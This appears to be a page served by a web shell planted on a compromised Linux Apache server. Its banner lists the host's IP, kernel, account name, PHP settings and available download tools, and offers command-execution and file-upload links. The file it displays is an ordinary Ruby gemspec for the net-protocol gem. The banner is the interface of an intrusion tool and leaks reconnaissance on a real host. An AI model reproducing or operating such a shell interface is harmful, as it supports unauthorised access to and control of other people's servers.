|
Server IP : 192.168.23.10 / Your IP : 216.73.216.84 Web Server : Apache System : Linux echo.premieradvertising.com 5.14.0-362.8.1.el9_3.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 7 14:54:22 EST 2023 x86_64 User : rrrallyteam ( 1049) PHP Version : 8.1.34 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /usr/share/locale/khi/../ug/../../gems/specifications/default/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
# -*- encoding: utf-8 -*-
# stub: net-protocol 0.1.1 ruby lib
Gem::Specification.new do |s|
s.name = "net-protocol".freeze
s.version = "0.1.1"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.metadata = { "homepage_uri" => "https://github.com/ruby/net-protocol", "source_code_uri" => "https://github.com/ruby/net-protocol" } if s.respond_to? :metadata=
s.require_paths = ["lib".freeze]
s.authors = ["Yukihiro Matsumoto".freeze]
s.bindir = "exe".freeze
s.date = "2025-04-11"
s.description = "The abstruct interface for net-* client.".freeze
s.email = ["matz@ruby-lang.org".freeze]
s.files = ["net/protocol.rb".freeze]
s.homepage = "https://github.com/ruby/net-protocol".freeze
s.licenses = ["Ruby".freeze, "BSD-2-Clause".freeze]
s.required_ruby_version = Gem::Requirement.new(">= 2.3.0".freeze)
s.rubygems_version = "3.2.33".freeze
s.summary = "The abstruct interface for net-* client.".freeze
if s.respond_to? :specification_version then
s.specification_version = 4
end
if s.respond_to? :add_runtime_dependency then
s.add_runtime_dependency(%q<timeout>.freeze, [">= 0"])
s.add_runtime_dependency(%q<io-wait>.freeze, [">= 0"])
else
s.add_dependency(%q<timeout>.freeze, [">= 0"])
s.add_dependency(%q<io-wait>.freeze, [">= 0"])
end
end